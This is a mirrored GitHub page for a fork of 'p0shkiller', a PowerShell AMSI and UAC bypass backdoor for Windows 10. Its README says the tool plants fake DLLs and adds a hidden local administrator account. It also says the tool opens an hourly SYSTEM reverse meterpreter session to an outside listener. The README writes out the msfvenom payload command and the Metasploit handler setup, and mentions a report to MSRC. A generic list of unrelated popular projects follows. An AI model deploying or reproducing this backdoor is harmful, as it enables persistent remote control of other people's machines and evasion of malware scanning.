00kush00 / p0shkiller Goto Github PK
View Code? Open in Web Editor NEWThis project forked from cn33liz/p0shkiller
License: BSD 3-Clause "New" or "Revised" License
This project forked from cn33liz/p0shkiller
License: BSD 3-Clause "New" or "Revised" License
_______ .__ ____ __.__.__ .__ ______ \ _ \ _____| |__ | |/ _|__| | | | ___________ \____ \/ /_\ \ / ___/ | \| < | | | | | _/ __ \_ __ \ | |_> > \_/ \\___ \| Y \ | \| | |_| |_\ ___/| | \/ | __/ \_____ /____ >___| /____|__ \__|____/____/\___ >__| |__| \/ \/ \/ \/ \/ By Cn33liz - 2016 Windows 10 PowerShell5 - Amsi/UAC Bypass/Backdoor/Exploit using DLL Hijacking Proof of Concept exploit to bypass Microsoft latest AntiMalware Scan Interface technology within PowerShell5 on Windows 10. With this exploit/patch applied, you can take control over powershells program flow by using DLL Hijacking and UAC Bypasstechniques. Every time powershell is started, a local admin named BadAss with password FacePalm01 will be added to the system (when run by an non elevated administrator account) and a reverse (SYSTEM) https meterpreter session (default 192.168.1.120) will be started every hour using a scheduled task. Current status: * Reported to MSRC on 28-03-2016 * From Microsoft perspective AMSI/AntiVirus isn't a traditional security boundary. Requirements: * A Windows 10 Box with latest security patches applied. * Default UAC settings. * Local administrator privileges to apply the patch (no need for elevation because Exploit uses UAC bypass to patch Amsi/Powershell). * A remote https reversed meterpreter listener. * A p0sh Fanboy that uses powershell on his system ;) This Exploit contains 5 components (and 1 python script): p0shKiller.exe - The main tool to apply the Patch (only needed once). UacBypass.dll - Will be injected into explorer.exe process and uses IFileOperation (COM Interface) to copy needed DLL's (only needed once). Amsi.dll - This fake DLL is copied into: C:\Windows\System32\WindowsPowerShell\v1.0, and is the main vulnerable component. ntwdblib.dll - Fake ntwdblib.dll copied into C:\Windows\System32, which is used by cliconfg.exe (elevated process) to bypass UAC. MPAmsiRun.exe - Xor'ed Meterpreter Shellcode payload that is copied into C:\Windows\System32 and called by Amsi.dll. XORMeter.py - Python Script to generate your own Meterpreter Payload (MPAmsiRun.exe) By @vvalien1 The following shellcode is used as payload and compiled within the code: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.120 LPORT=443 EXITFUNC=thread -f hex > Shellcode.txt Setup your remote msf listener: use exploit/multi/handler set payload windows/x64/meterpreter/reverse_https set LHOST 0.0.0.0 set LPORT 443 set AutoRunScript post/windows/manage/priv_migrate exploit -j * Parts of this code has been borrowed from: https://github.com/hjc4869/UacBypass
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.